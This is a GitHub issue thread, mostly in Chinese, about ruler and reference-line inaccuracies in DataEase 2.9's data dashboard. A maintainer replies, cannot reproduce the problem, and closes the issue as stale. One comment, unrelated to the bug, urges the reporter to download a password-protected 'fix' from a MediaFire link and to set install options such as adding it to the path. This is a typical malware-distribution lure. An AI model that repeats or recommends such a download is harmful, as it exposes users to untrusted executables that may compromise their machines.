### ISSUE TITLE
[Bug]【数据大屏】优化一下参考线标尺的准确度

### ISSUE THREAD

**Issue by zhangtong9898** [dataease/dataease#11776]
**DataEase 版本**
2.9

**运行方式(安装包运行 or 源码运行 ?)**
源码运行

**浏览器版本**
chrome

**Bug 描述**
1.数据大屏的标尺参考线不准
2.按键盘上下左右键调节组件位置细节时，数值会加1-不等，而不是按一下加一个。
3.移动画布后，标尺偏移。

**Bug 重现步骤(有截图更好)**
1.
![image](https://github.com/user-attachments/assets/9c8a6a3b-3be0-4f51-9fb8-5788e234502c)

2.
![image](https://github.com/user-attachments/assets/b5eb42fa-f6e7-48f7-a400-bd26a6557a5a)

3.
![image](https://github.com/user-attachments/assets/8517663b-53ed-433d-a81b-60e8aa06bf2c)

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by BBchicken-9527** [comment]
感谢反馈，目前测试环境没有发现你说的问题，受累看一下清除缓存后是否依然存在此类问题；

**Comment by BBchicken-9527** [comment]
由于问题状态停留时间过长，我先将问题暂时关闭，若依旧存在此问题可随时重新打开问题或向公众群中反馈，到时会有非常专业的同学进行处理，感谢你的反馈与支持；
